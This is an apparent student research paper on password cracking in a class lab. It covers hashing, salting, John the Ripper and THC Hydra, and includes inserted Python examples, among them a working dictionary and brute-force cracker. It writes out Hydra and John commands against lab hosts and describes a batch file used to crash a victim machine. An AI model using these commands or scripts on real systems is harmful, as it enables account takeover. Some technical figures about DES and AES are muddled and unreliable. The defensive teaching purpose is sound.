
Cracking a P@$$w0rd

Tyler Lovell, Van Bettis, Michael Peritz
Florida State University
[email protected], [email protected], [email protected]

Abstract

The purpose of this research paper is to gain a better understanding of the vulnerabilities associated with passwords, how to exploit these vulnerabilities, and lastly how to defend against them. We will cover a broad range of attack methods in this paper, including brute force, dictionary attacks, breaking hash values, and network and user errors. To carry out our research we will be using several tools, including John the Ripper, Metasploit, and THC Hydra. They will be deployed in a sandbox environment to detect vulnerabilities and attempt to gain access to both our servers and those of other class members. After we have completed our testing, we will report our findings, delve into detection methods, and explain what can be done in order to fix and defend against these vulnerabilities. It is important to understand how attackers use these tools to crack passwords in order to defend against them and develop password procedures that are strong enough to avoid a breach in system integrity.

Keywords: Password, John the Ripper, Password Cracking, Audit, Authentication, Reaver, THC Hydra, Brute Force, Dictionary Attack, Hash

Introduction

Money, personal information, and even nuclear launch codes are all protected by passwords. Imagine if a hacker obtained the password to any of the items above. The scope of this paper will be password cracking. By executing different password cracking techniques, this study will find the best method to crack a password. Through discovering the most effective password cracking method, the most secure password policy is revealed. This is why it is important to research and understand how passwords are broken. By understanding how passwords are cracked, we can create more secure ones to protect our current way of life. The first step in doing this is to understand all the components that go into password management.

What is a password? “A password is a secret (typically a character string) that a claimant uses to authenticate its identity” (Scarfone, Souppaya, 2009, p. 2-1). Authentication is the act of confirming one’s identity. Typically, a unique identifier, such as a username, is paired with a password to permit access to some account. Authentication can involve something the user knows, something the user has, and something the user is. For example, Alice goes to an automated teller machine (ATM) to withdraw some funds. Alice knows her PIN, she has an ATM card, and she could use her fingerprint as something she is.

What are passwords used for? Passwords are used to protect data, systems, and networks. For example, passwords are used to authenticate users to their accounts and to other applications like email. Passwords are also used to protect stored information and data. Examples of this would be password protecting a single file or using an encrypted hard drive (Scarfone, 2009). The two major forms of passwords are the PIN and the passphrase. A PIN is by definition a personal identification number made up of digits only. PINs are usually 4-6 digits in length. A passphrase is typically a long password with letters, numbers, and symbols, which can be very secure if dictionary words are avoided and the numbers, letters, and symbols are diverse.


How are passwords generally exploited? There are three major ways passwords are cracked. The first one is called a brute force attack. It consists of trying every letter, number, and symbol possible to crack the password. Included in the brute force attack family is the dictionary attack, where the attacker creates a word library, links it to an account, and loops through the dictionary library until the correct password is found. Another popular attack is social engineering. This is where the attacker communicates with the target to obtain information that will assist in achieving the password attack. For instance, let's say Alice asks Bob what street he grew up on (maybe because she says she has a friend from his area). Later, Alice is trying to hack Bob’s email. From a 15-minute conversation she knows his birthday, where he grew up, his favorite food, and his first car. So Alice enters his email address, selects the option that Bob forgot his password and would like to answer the security question instead, and is asked for Bob’s first car. Alice answers the question and then creates a new password, effectively gaining access to Bob’s email. The final and most technical method is the cryptographic method. This involves discovering the technique used to encrypt the data and recovering the key using cryptanalysis. Please note that these methods are not mutually exclusive. The best password attack method or software should include aspects of all three. For example, Alice uses the brute force approach by creating a dictionary to hack Bob, but she couples it with the social engineering method by putting information into the dictionary that she gathered from interacting with Bob himself.

The scope of this paper mainly deals with passphrases. The obvious vulnerability of password protected systems is that a password can be cracked. In this paper, we will reference literature germane to the topic, discuss the environment used to research these attacks, and demonstrate three ways passwords can be cracked. The germane references will include known attacks as well as known effective methods for creating passwords. Later in this paper, countermeasures and detection methods for known attacks will also be addressed. It should be noted that a strong password policy is the baseline for secure systems.

Literature Review

In the digital era, passwords have become the standard method for user authentication. They are unavoidable when trying to secure a resource, be it your Facebook account or a secure server in the workplace. It is because of their widespread use that passwords are perhaps the most common attack vector amongst hackers. Some examples where hackers have targeted users’ passwords include the Ashley Madison scandal from 2015, the Bitcoin “brain drain” attacks, the ongoing ransomware attack against a Los Angeles hospital, and the attack against British Airways in 2015; the list goes on and will be discussed in more detail further on. This paper will focus on identifying and explaining some of the common methods hackers used in these situations, as it is important to understand how they work in order to effectively defend against them.

Contrary to popular belief, password cracking is not just when an attacker sits down and repeatedly guesses a user's password. In fact, more often than not, the first step in password cracking is to use another attack vector to obtain, through various means, the files containing the encrypted passwords as they are stored on a system. In the Ashley Madison case, the attackers retrieved a large amount of data from the website's database, including the hashed password files of ALM, the corporation in charge of the website. They then released them to the public (Mansfield-Devine, 2015). These released files can be cracked using popular tools such as John the Ripper, and the recovered passwords can then be used to further breach the website and company resources.

Another popular means of obtaining passwords is to exploit a weakness in how they are stored in order to retrieve them in plaintext, that is, in a human readable format. In the Bitcoin hack in mid-February of this year, hackers targeted the website's method of storing passwords in what they call a “brain wallet” (Goodin, 2016). A brain wallet is the use of a passphrase to directly access and spend the user’s funds. For example, Alice has 10 bitcoins she wants to use. So she types in her passphrase, which is “My favorite color is pink.” The system then runs the phrase through an encryption method that generates Alice’s private key and authenticates her as the user. Now that Alice has been authenticated using her passphrase, her “brain wallet” allows her to spend the money without going through any more steps. As you can see, the obvious problem with brain wallets is that they rely on the human user to generate a strong enough passphrase, and as time has shown, humans are an awful source of entropy. In addition to this, brain wallets do not use any form of cryptographic salt and involve passing a plaintext phrase once through a hash method such as SHA256 (Goodin, 2016). As a result, the hackers were able to easily crack users’ passphrases and generate the corresponding private keys using offline dictionary attacks. These passphrases and private keys were then used to withdraw the victims’ funds. Over the past six years it has been estimated that roughly $100,000 has been stolen using this exploit in Bitcoin's password protection method.

More often than not, people like to keep their lives simple and reuse passwords and usernames across a large number of platforms, websites, and services. As a result, when one location is compromised because of weak security or persistent attackers, other sites are affected and compromised as well. British Airways is one such company that has been the victim of a data breach as a result of its frequent flyers' poor password management. Last April British Airways released a statement saying “British Airways has become aware of some unauthorized activity in relation to a small number of frequent-flyer executive club accounts. We would like to reassure customers that at this stage we are not aware of any access to any subsequent information pages within accounts, including travel histories or payment card details” (Network Security, 2015, p. 2). These types of press releases are common when cyber-attacks are made against a company and are used as part of its incident response strategy. They said that this attack was the result of a third party that was “using information obtained elsewhere on the Internet, via an automated process” (Network Security, 2015). Essentially, a hacker obtained usernames and passwords from another site that had been compromised and then, in the hope that the users had reused them elsewhere, performed brute force attacks against the system. In response to this attack, British Airways did perhaps the best thing it could have done: it immediately locked down the accounts and reset all the passwords.

Perhaps the easiest way hackers crack people’s passwords is by using generated lists that contain the world's worst and most used passwords and conducting dictionary attacks. Every year SplashData, a company that has provided security applications and services for more than 10 years, releases a list of the world's worst passwords. To security professionals this list is an amusing joke, but in reality it serves as a lesson about why those passwords exist and the terrifying reality that people actually use them. CSO ran an experiment using SplashData's list against a database of roughly 68,000 unsalted MD5 password hashes from the website MMO King that was leaked last year (Ragan, 2016). It took the team 45 minutes using Hashcat on Kali Linux to crack 80% of the list. That’s roughly 54,000 passwords and accounts compromised in 45 minutes because of poor password policies amongst gamers (Ragan, 2016).
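As an added illustration, not part of the original paper, the following Python script shows how an administrator can apply the lesson of the SplashData list proactively: check candidate passwords against a blocklist of known-bad entries and against the length and character-diversity requirements described earlier, before they are ever stored. The blocklist entries, the 12-character minimum and the normalization rule are constructed assumptions for this example, not values taken from the paper or from SplashData's published list.

```python
import re
from dataclasses import dataclass, field

# Constructed stand-in for a "worst passwords" list such as SplashData's annual list.
# A real deployment would load the full published list (or a breach corpus) from a file.
WORST_PASSWORDS = frozenset({
    "123456", "password", "qwerty", "letmein", "football", "welcome", "admin", "login",
})

MIN_LENGTH = 12  # assumed policy value for this example, not one the paper prescribes


@dataclass
class PolicyResult:
    ok: bool
    reasons: list[str] = field(default_factory=list)


def normalize(password: str) -> str:
    """Fold the trivial mangling people apply to a weak base word (capital first
    letter, trailing digits or symbols) so that 'Password1!' is checked as 'password'.
    This mirrors the word-mangling rules cracking tools apply to their wordlists."""
    return re.sub(r"[\d\W_]+$", "", password.lower())


def check_password(password: str, blocklist: frozenset = WORST_PASSWORDS) -> PolicyResult:
    """Evaluate one candidate password against the policy and return every reason it fails."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if password.lower() in blocklist or normalize(password) in blocklist:
        reasons.append("on the common-password blocklist")
    # Character-class diversity: lowercase, uppercase, digits, symbols.
    classes = [
        re.search(r"[a-z]", password),
        re.search(r"[A-Z]", password),
        re.search(r"\d", password),
        re.search(r"[^\w\s]", password),
    ]
    if sum(1 for c in classes if c) < 3:
        reasons.append("uses fewer than three of: lowercase, uppercase, digits, symbols")
    return PolicyResult(ok=not reasons, reasons=reasons)


def audit(accounts: dict[str, str]) -> dict[str, list[str]]:
    """Return the accounts that fail the policy and why: the report an administrator
    acts on instead of waiting for a cracker to find the weak entries first."""
    failures = {}
    for user, pw in accounts.items():
        result = check_password(pw)
        if not result.ok:
            failures[user] = result.reasons
    return failures


if __name__ == "__main__":
    # Constructed sample accounts; none of these are real credentials.
    sample = {"alice": "Password1!", "bob": "Tr0ub4dor&3-ShB9", "carol": "Football2024"}
    for user, reasons in audit(sample).items():
        print(f"{user}: {'; '.join(reasons)}")
```

The normalization step is what makes the blocklist useful in practice: "Football2024" is twelve characters and mixes three character classes, so a naive policy would accept it, but its base word is on the list and a wordlist attack with mangling rules would find it quickly.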

With all of these data breaches obtained through the abuse and hacking of users’ passwords and password protection systems, companies have begun to crack down and harden their password policies and management. Many companies, such as Apple, Google, Facebook, and in general every security-conscious service provider, are using encryption and storage methods that are incredibly time consuming and difficult to break. These companies run their passwords through encryption methods several times while utilizing salt values that are specific to each password, requiring anyone wanting to crack them to invest an enormous amount of time and resources (Goodin, 2016).

Last year in the United Kingdom, a government-commissioned survey discovered that 90% of global industrial companies had suffered some kind of security breach (Ganesan, 2016). These breaches were in part caused by the complexity involved in password management for the hundreds or, in some cases, thousands of employees, all with different levels of access rights and privileges. The solution to this is the use of a password management solution, as it can provide a critical middle ground between leaving passwords at risk and keeping them locked up to the point where time and productivity are wasted while waiting for approval (Ganesan, 2016). These password management solutions work by scanning the company's Active Directory and providing a comprehensive overview of users, their passwords across all devices and operating systems, and the permissions associated with them. This allows the security administrator to easily manage and reset all passwords across the company, effectively bringing users under their control and policies. These password managers also allow the administrator to generate reports on the privileges associated with each password and user (Ganesan, 2016). In theory, a password manager should be flexible and allow for easy access when dealing with temporary users, as well as be accessible from any device as required across sites. At a time when nefarious activities are at an all-time high, organizations need to be on high alert and constantly managing logs and passwords. These management tools make it easier to overcome the threat posed by insecure password use while increasing visibility and transparency, without requiring additional administrative time or resources (Ganesan, 2016).

However, while most companies are increasing their encryption strength and password management protocols, governments are attempting to force them to weaken them. In the United Kingdom, for example, lawmakers are working on a controversial new bill titled the Investigatory Powers Bill. The bill essentially requires that internet service providers keep customer records (internet usage) and forces companies to provide backdoors for law enforcement and intelligence agencies (Network Security, 2016). In a recent statement, Apple came out against this bill by saying that “A key left under the doormat would not just be there for the good guys. The bad guys would find it too.” (Network Security, 2016, p. 2).

Lab Systems Settings and Description

Network Topology

The basic network topology of our group’s virtual environment breaks down very easily: our Windows, Ubuntu, and Apache VMs are behind our PFSense firewall. Outside of the firewall we have our Security Onion and Kali Linux machines. All of these machines run on a central network to which the other teams are also connected, essentially creating an internet highway where the on-ramps and off-ramps lead to each team's own infrastructure. In this analogy, PFSense acts like a road closure or blockade that permits only approved traffic. This is the network that we have set up and are working on.

System Configuration

For this project we were given multiple virtual machines (VMs) within a Virtual Private Network, or VPN for short. A VM operates just like any normal computer would, but because it is accessed virtually, the VM itself has no physical existence. There are some minor differences and, most importantly, benefits to this. Specifically, by using a VM you can run a different operating system than the one currently found on the computer accessing the VM. Also, since these VMs are not necessarily tied to a specific computer, they become sandbox environments in which you set the variables and controls.

A total of 18 machines were given to us by our instructor: five Apache servers, five Windows 2008 instances, a Security Onion, five Kali Linux machines, a PFSense firewall, and Comodo. All of these we received in a “new” state, by which we mean that we were turning them on for the first time. This was the true test because everything needed to be configured. First we started with the Windows machines, booting up each one and running through the initial setup process, the basic configuration of the workstations.

The Apache machine was extremely easy to set up. After starting the computer for the first time, we navigated to the command line. Because LAMP (Linux, Apache, MySQL, PHP) was already set up, we navigated to our IP address in a web browser to find our home page. This unfortunately did not work on the first try, so we went back to the command line and ran the command service apache2 start, which started the Apache service. After revisiting the IP address in the browser we were greeted with the Apache home page. This meant that we had successfully got our homepage up and running. We have yet to use our Ubuntu VMs for anything relating to this project; however, we have already put them behind the firewall so as to secure our systems in their entirety.


After this, we booted up the PFSense firewall and navigated the terminal menu until we found the option that started the inline web interface (option 11, to be exact). Since we had already been given a list of the IP addresses associated with each machine on the network, all that was left was to place each of them behind the firewall. To route our Windows machines through the firewall, we opened the network connection icon in the bottom right of the screen, then clicked on the Local Area Connection Status (in this case it was LAC 2). After clicking Properties, we selected the Internet Protocol Version 4 (TCP/IPv4) item and then clicked Properties again. This brings up a new pop-up, as seen in figure 1 in the appendix. In this dialog you set the IP address to the static IP of the machine you are currently using, and the subnet mask fills in automatically. The default gateway is the IP address of the external firewall you are using, in this case the IP address of the PFSense that our team was assigned, 192.168.72.81. Once this has been completed, the machine has been successfully placed behind the firewall. We repeated this for the Ubuntu, Windows, and Apache machines assigned to our group, except our honeypot.

Now that each machine and the firewall are up and running, and each machine except our honeypot is behind the firewall, we switched focus to the defensive side: the Security Onion. The Security Onion has been installed on a VM and is our watchdog for this project. It runs on the network and monitors certain IP addresses; by doing this we can see what is occurring on those machines, such as logins and other activity. This is critical so that we know what is occurring and where, helping us to establish who is trying to attack us and the source of the attack. The Security Onion was actually the easiest VM to set up, because all you had to do was run the installer and tell the Onion which network to monitor. After we set the Security Onion to monitor the IP addresses of our machines, it was time to move on to the next step.

The next step was getting our Kali Linux machines up and running. This required starting the machines for the first time. For some of us there was no desktop interface already set up on the machine, so we had to install one, namely GNOME. We chose GNOME because it was an easy and fast install that required the fewest steps and provided a comfortable, familiar interface. Because this machine does not need protection, it was left outside the firewall.

Password Cracking Threat Types

Cryptography

Cryptology is the study of secure communications. Cryptography is the branch dealing with the design of algorithms to secure information. The most effective tool in securing passwords is the one-way hash function. Hash functions are used to keep passwords private. The hash function maps a variable-length string to a fixed-length value referred to as a hash code. An operating system stores a hash of a password rather than the password itself. Thus, the actual password is not retrievable by a hacker who gains access to the password file. In simple terms, when a user enters a password, the hash of that password is compared to the stored hash value for verification.

The vulnerability of passwords is essentially time. For example, if a hacker had a life span of a trillion years, he or she could crack any password without even knowing how to code. With the Data Encryption Standard (DES), which uses a minimal 56-bit key to create 64-bit blocks of ciphertext, it would take 2^56 years to crack using a normal computer. The drawback is that it is vulnerable to cryptanalysis and the 64-bit size is not that large. It would take only an hour with a supercomputer. However, with a 128-bit key using the Advanced Encryption Standard (AES), it would take the supercomputer 5.3 x 10^17. Triple DES uses the same method as DES, except it performs the calculation three times using two or three unique keys. This would be the best design for security, but 3DES is slow, does not work well with modern software, and also produces only 64-bit ciphertext blocks.

Passwords are susceptible to several password attack methods. The offline dictionary attack is the first, and will be demonstrated in this paper. The attacker obtains the system password file and compares its entries against the hashes of his or her dictionary. The attacker may not always be a stranger. Password guessing against a single user targets users the attacker knows. The attacker guesses the password manually, but knows the victim, or at least has information about the victim, which makes the guesses more educated. This attack becomes even more feasible when you consider the security question safety valve. What street you lived on when you were eight, your first car, and your first grade teacher are all public record. Information like this could also be revealed in a fifteen-minute conversation. Sometimes employees forget to log out of their systems, and attackers can hijack the workstation. Exploiting user mistakes like falling for a phishing email or sharing too much information is always a possibility. Similar to that is using the same password for multiple accounts. If the hacker breaks one password, the attacker will try it on all known accounts. Those who use the same password for different accounts are at greater risk of greater loss.

To make it even more time consuming to crack passwords, the technique of adding a salt value to the hash computation is widely used. The salt value is a fixed-length value added to the hash function input to create a fixed-length hash code. When the user creates a password, a salt value is assigned by a pseudo random number generator. The hashed password is stored with a plaintext copy of the salt. When a user is being authenticated, the user provides an ID and password. The user ID is used to look up the hashed password and the salt value. If the system’s calculation over the user input matches the entry in the shadow file, then the user is granted access. Salt makes stored passwords more unique because each user is assigned a unique salt value. For example, if two users use the same password, the hash values will differ because each user is assigned a distinct salt value, producing a unique hash result. The salt value makes the offline dictionary attack much harder to execute. For a salt value of b bits, the number of possible passwords is increased by a factor of 2^b. In other words, let’s say an attacker has a hash file without salt values. For every hash created, it becomes increasingly more likely that each subsequent guess will be correct. When the attacker creates a hash, he can check it against the hash file, and if the hash result is not there then that hash does not belong to any of the users. Conversely, if the hash file is salted, then the dictionary attack becomes virtually impossible. Even if the attacker guesses the correct password and hashes it, without the correct salt value the hash will not match. If the attacker miraculously guesses the salt value, it would still be nearly impossible to find out whether a person with passwords on multiple systems is using the same password, because each password, even if it is the same password, is assigned a unique salt value.

Hashing and encrypting are both forms of cryptography, but hashing is different from encrypting. Encryption is a two-way function: I encrypt something so it can be decrypted by the person I am communicating with. Conversely, hashing is a one-way function; hash functions are not intended to be reversed. This is what dictionary attacks exploit: the hacker creates a dictionary, writes a script to scramble the numbers and letters into various strings, hashes the newly created strings, and compares the newly hashed strings against a target hash file.
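As an added example (not code from the paper), the following Python script implements the scheme described in the last three paragraphs: a per-user random salt stored in plaintext beside a PBKDF2-SHA256 digest, verification by re-deriving the digest with the stored salt, and, for contrast, the single unsalted SHA-256 pass that the brain-wallet discussion warned about. The account names and passwords are constructed, and the 100,000-iteration work factor and 16-byte salt are assumptions made for this example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Work factor for PBKDF2; an assumed value chosen for this example, not taken from the paper.
PBKDF2_ITERATIONS = 100_000
SALT_BYTES = 16  # b = 128 bits of salt, so 2^128 possible salt values per user


def hash_password(password: str, salt: Optional[bytes] = None) -> tuple[bytes, bytes]:
    """Return (salt, digest).

    When no salt is supplied a fresh one is drawn from the OS random source,
    as the paper describes: the salt is generated at password-creation time
    and is stored in plaintext beside the hash, never kept secret.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Authentication step: take the user's stored salt, re-derive, compare.

    hmac.compare_digest avoids leaking how many leading bytes matched
    through timing differences.
    """
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored_digest)


def build_shadow(users: dict[str, str]) -> dict[str, tuple[bytes, bytes]]:
    """Build a shadow-style table: username -> (salt, digest)."""
    return {name: hash_password(pw) for name, pw in users.items()}


def unsalted_sha256(password: str) -> bytes:
    """The weak scheme the paper describes for brain wallets: one pass of
    SHA-256 over the plaintext with no salt, so equal passwords give equal hashes."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def users_matching_guess(table: dict[str, bytes], guess: str) -> list[str]:
    """Audit view of the unsalted weakness: a single hash of one candidate can be
    compared against every stored digest at once, so one weak shared password
    exposes every account that uses it."""
    target = unsalted_sha256(guess)
    return sorted(name for name, digest in table.items() if digest == target)


def demo() -> dict:
    # Constructed sample accounts; alice and carol deliberately share a password.
    users = {"alice": "correct horse", "bob": "Tr0ub4dor&3", "carol": "correct horse"}

    shadow = build_shadow(users)
    unsalted = {name: unsalted_sha256(pw) for name, pw in users.items()}

    return {
        # Salted: same password, different salts, different digests.
        "salted_digests_differ": shadow["alice"][1] != shadow["carol"][1],
        # Unsalted: identical passwords collapse to one identical hash.
        "unsalted_digests_equal": unsalted["alice"] == unsalted["carol"],
        # One comparison against the unsalted table finds both accounts.
        "exposed_by_one_lookup": users_matching_guess(unsalted, "correct horse"),
        # A legitimate login still works and a wrong password is rejected.
        "alice_login_ok": verify_password("correct horse", *shadow["alice"]),
        "alice_wrong_rejected": verify_password("correct horsE", *shadow["alice"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two design choices matter here. PBKDF2 is used instead of a bare hash because, as the paper notes for Apple and Google, iterating the function raises the cost of every guess; and the comparison is done with hmac.compare_digest rather than == so that the verification path itself does not become a side channel.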

Attack Method: John the Ripper

John the Ripper is an open source password-cracking tool. Being an open source project, various security companies often release upgraded versions of John the Ripper. The software is released in packages and is free for the public to download. The improvements are usually to the speed of the password cracking itself. For example, in 2011, Openwall, an IT security and products company, released a version of John the Ripper that cracks password hashes based on the Data Encryption Standard (DES) algorithm on CPUs 17 percent faster than the previous best results (Benzingna, 2011).

John the Ripper is commonly used among system administrators to enforce their password policy (Sykes, Lin, Skoczen, 2010). The system administrator will continually run John the Ripper, most likely configured with certain specifications, against machines in the office; if an employee’s workstation password gets cracked, then that employee is not following the password policy. Also, note that the administrator could run John the Ripper with no specifications, which means that even if the cracked password conforms to the password policy, the employee will still be asked to change his or her password. Along with cracking weak passwords, John the Ripper is also used by system administrators to recover lost passwords on machines (Sykes, 2010).

John the Ripper basically just guesses at the password. It does this by repeatedly trying to produce a string that matches the password (Sykes, 2010). That is the basic idea, but John the Ripper is a little more complex. It has to be more complex because passwords are hashed on most machines worth attacking. First, what is hashing? Put simply, hashing is a one-way function in which every input is transformed into a fixed-size value. Basically you put in something like “Michael” and you get something like “BDBd 3465 fgh33 4567 ssdwe3”, but usually much longer. Passwords are the most commonly used tool for authentication. When you create a password for an online account, Amazon for example, Amazon’s website takes that password, hashes it, and saves the hash of that password in a hash file. When you go back to the website and enter your password, the website authenticates you as the true account holder by hashing that password again and comparing the result against the hashed passwords accumulated in the hashed password file. If there is a match that correlates with your username, then you are authenticated and access is granted. John the Ripper takes advantage of this method of storing hashed passwords and comparing them to hashed inputs later. John the Ripper hashes its guesses with the same algorithms used to create the stored passwords. After John the Ripper hashes its guesses, it compares the newly created hashes to the original hashes (Sykes, 2010), just like in the Amazon example.

John the Ripper can be run in four different modes. The first mode is called Incremental. The Incremental mode is the simplest; it applies the brute force method discussed earlier. Wordlist and Single mode apply the dictionary method. The Wordlist mode uses a text file that can be defined by the user as the dictionary, whereas the Single mode gathers its candidate words from the password file itself. Lastly, External mode lets the user run modes of their own definition, which the user writes in a programming language (Sykes, 2010). With External mode the administrator can run his own concoction, most likely a modified version of the other three modes.

John the Ripper dates from the mid-1990s and, being an open source project, has been modified and extended many times since. The basic version supports a number of hash formats: the traditional Unix DES-based crypt, a double-length DES variant, BSDI extended DES, FreeBSD MD5 crypt and OpenBSD Blowfish (bcrypt), as well as Kerberos AFS and Windows LM hashes (Sykes, 2010). The software is not without limitations. The major one is that it can only attack formats it knows. If a new hashing scheme is created, support for it has to be programmed into John before the tool can hash its guesses in that scheme and compare them with the stored hashes. For the same reason John cannot be used directly against a machine that stores passwords with an unknown or custom algorithm; the format must be present in John the Ripper's source code for it to crack the passwords of the desired target (Sykes, 2010).

John the Ripper is most useful to an administrator auditing compliance with a password policy, or recovering a password on a key machine. It is, in essence, a free brute force and dictionary password cracking package. Its inability to learn new formats on its own leaves room for improvement, and given how actively the open source project is worked on, those improvements will inevitably be made.

To run the attack we placed the wordlist and the hash file in John the Ripper's run directory, the folder that also holds the executable, so that when John is pointed at the hash file it finds the wordlist in the same folder. (John also accepts a path to a wordlist with --wordlist=, so this is a convenience rather than a requirement.) Appendix figure 19 shows the newly created folder "J.t.r" inside the security folder and, within it, the "jtr" folder; the final element of the path is the run folder, which contains john.exe and the hash file "bo3.hashfile.txt". Figure 20 shows the files inside the run folder, and figure 21 the command as executed at the command prompt of our Windows machine. The exact command used was "John.exe b03.hshfile.txt". Run this way, with no mode specified, John works through its default sequence of single mode, wordlist mode with its bundled list and then incremental mode, and the attack recovered the passwords in the hash file. Once we had entered the victim's computer, we created a batch file and executed it at the command prompt; the program in the batch file put the computer into an infinite loop, effectively crashing it. The batch file contained the text "Start start start start start start start stop." This was done to show, in a non-harmful way, the consequences of a successful password attack.

Brute Force and Dictionary Attacks

When it comes to the methods nefarious individuals use to discover your password, brute force and dictionary attacks are the two main ones. Both boil down to guess and check: the attacker picks a username and password combination, tries it, and keeps trying new combinations until one succeeds. The two differ in where the guesses come from.

A dictionary attack is the simpler of the two and is driven by a set of lists, or libraries. These are generally made up of popular usernames and popular passwords, but they can also contain dictionary words, passwords from earlier breaches, random strings, or keywords specific to the user being targeted. The defining property is that the attack is limited to the contents of the lists being used. There is no random combination or random guessing, so a password that is not in the list (or derivable from it by simple mangling rules) will never be found.

A brute force attack removes that limitation. It tries every possible password (and, unless the attacker already knows them, every possible username) from a defined character set. This can be done by hand, but it is almost always carried out by software that runs through every combination of letters, digits, punctuation and symbols. Brute force attacks generally take a long time, and that time depends on the size of the character set, the length of the password and the speed of the attacking machine. Knowing that a user has an eight character password drawn from the 95 printable characters on a keyboard, an attacker faces 95^8, about 6.6 × 10^15, possibilities. At the roughly thirty guesses per second we later measured against a network login, exhausting that space would take on the order of seven million years; against a stolen copy of a fast hash such as NTLM, cracked offline on a modern multi-GPU rig at tens of billions of guesses per second, the same space falls in days or less. The gap between online guessing against a live service and offline cracking of leaked hashes is the whole game.
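The hash-and-compare mechanism described in the John the Ripper section and the dictionary versus brute force distinction above, as one added example. This is not the paper's code and not John the Ripper's; the hash records, salts, wordlist and mangling rules are constructed for illustration, and SHA-256 stands in for whatever hash format a real target uses.

```python
"""Hash-and-compare password cracking over a constructed hash list.

Added example; it is not the paper's code and not John the Ripper's. It shows
the mechanism the text describes: the system stores salt + one-way hash, so a
cracker hashes each guess with the same algorithm and compares. The records,
salts, wordlist and mangling rules are constructed; SHA-256 stands in for
whatever format the target actually uses.
"""
import hashlib
import itertools
import string


def hash_password(salt, password):
    """The target system's (constructed) scheme: sha256(salt || password), hex digest."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed hash file: (username, salt, stored hash). The per-user salt is what
# forces a cracker to hash each guess once per account instead of once in total.
HASH_FILE = [
    ("admin", "x9Kq", hash_password("x9Kq", "4777super")),
    ("yi", "Lm2p", hash_password("Lm2p", "p455w0rd")),
    ("sean", "Qr7z", hash_password("Qr7z", "ab1")),
]

# Constructed wordlist, in the spirit of a tiny rockyou.txt excerpt.
WORDLIST = ["123456", "password", "letmein", "4777super", "dragon"]


def mangle(word):
    """A few John-style word-mangling rules applied to one dictionary word."""
    yield word
    yield word.capitalize()
    yield word.upper()
    yield word.replace("a", "4").replace("s", "5").replace("o", "0")
    yield word + "1"
    yield word + "!"


def dictionary_attack(records, wordlist):
    """Wordlist mode: {user: password} for every record hit by a (mangled) wordlist entry."""
    found = {}
    for user, salt, stored in records:
        for word in wordlist:
            match = next((c for c in mangle(word) if hash_password(salt, c) == stored), None)
            if match is not None:
                found[user] = match
                break
    return found


def incremental_attack(records, charset=string.ascii_lowercase + string.digits, max_len=3):
    """Incremental (brute force) mode: every string of length 1..max_len over charset.
    Each guess is hashed once per account still uncracked, because of the salts."""
    found = {}
    remaining = {user: (salt, stored) for user, salt, stored in records}
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            guess = "".join(combo)
            for user in list(remaining):
                salt, stored = remaining[user]
                if hash_password(salt, guess) == stored:
                    found[user] = guess
                    del remaining[user]
            if not remaining:
                return found
    return found


def keyspace_years(charset_size, length, guesses_per_second):
    """Years needed to exhaust charset_size**length at a given guess rate."""
    return charset_size ** length / guesses_per_second / (365.25 * 24 * 3600)


if __name__ == "__main__":
    print(dictionary_attack(HASH_FILE, WORDLIST))  # wordlist + rules recover admin and yi
    print(incremental_attack(HASH_FILE))           # brute force recovers only the 3-char password
    print(round(keyspace_years(95, 8, 30)))        # online rate: millions of years
    print(keyspace_years(95, 8, 1e10))             # offline GPU rate: a fraction of a year
```

The wordlist pass recovers the two accounts whose passwords are a list entry or a simple mangling of one, and never finds "ab1" because nothing in the list produces it; the incremental pass finds "ab1" in under a second but would never finish on the nine-character passwords. keyspace_years with the thirty-per-second rate measured later in this paper versus a ten-billion-per-second offline rate is the difference between online guessing and offline cracking in one call.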

Attack Method: THC Hydra

To conduct our research on brute force and dictionary attacks we used THC Hydra on Kali Linux against a Windows 7 machine and a pfSense firewall. THC Hydra is a tool for cracking network logons by attacking the authentication of many different services. It is a public open source project written by van Hauser and maintained with David Maciejak, intended to help security auditors detect weak passwords protecting network resources and to give researchers a tool that shows just how easy unauthorized remote access can be. It is one of the best known and most used remote authentication cracking tools because it is fast and versatile. Its speed comes from parallel connections: it opens several connections to the target and runs login attempts over them concurrently. Its versatility comes from the roughly fifty protocols it can run dictionary and brute force attacks against, among them Telnet, HTTP/S, SSH, POP3, MySQL, MS-SQL, Oracle, SMTP and SMB.

The first step in any remote attack is to identify the machines on the network and which ports they have open. We used the network mapper Nmap through its Zenmap front end and ran a deep scan of 192.168.72.0/24, 10.0.20.0/24 and 10.0.10.0/24 (appendix, figure 1). Our goal was to find hosts, both behind the firewalls and outside them, running a service that THC Hydra can attack. We narrowed the search to hosts running the Server Message Block (SMB) protocol, because it is enabled by default on Windows and gives us a network login to brute force directly, and we also noted hosts running HTTP and SSH, which are frequently exposed to this kind of attack.

The Microsoft Windows Server Message Block (SMB) protocol is used for network file sharing. It consists of a series of data packets, each carrying either a request from the user's client or the response from the server. While SMB's main function is file sharing, it is also used for several other purposes, such as printing over a network and discovering other SMB servers on the network.

Once we had a list of the machines exposing an attackable protocol, the next step was to run dictionary attacks against one machine at a time. With THC Hydra this is done with a single command of the general form: hydra -l <username> -P <passwordlist.txt> <target address> <service>. Here -l takes a specific username (-L would take a file of usernames); lucky for us we knew that the username admin was in use, so that is the one we targeted. Next we replaced the password list with our own dictionary. We tried several, including the lists that ship with Kali Linux and downloadable ones such as SplashData's list of worst password choices. Next we replaced the target address with the Windows server we had determined was running SMB, or with the firewall we wished to attack. The last element, the service, can be any of the protocol modules THC Hydra supports, but for our research we stuck with the protocols mentioned above. The full command for our dictionary attack against the vulnerable Windows machine was hydra -l admin -P rockyou.txt 192.168.72.54 smb (appendix, figure 3). It tried the username admin with every password listed in rockyou.txt.

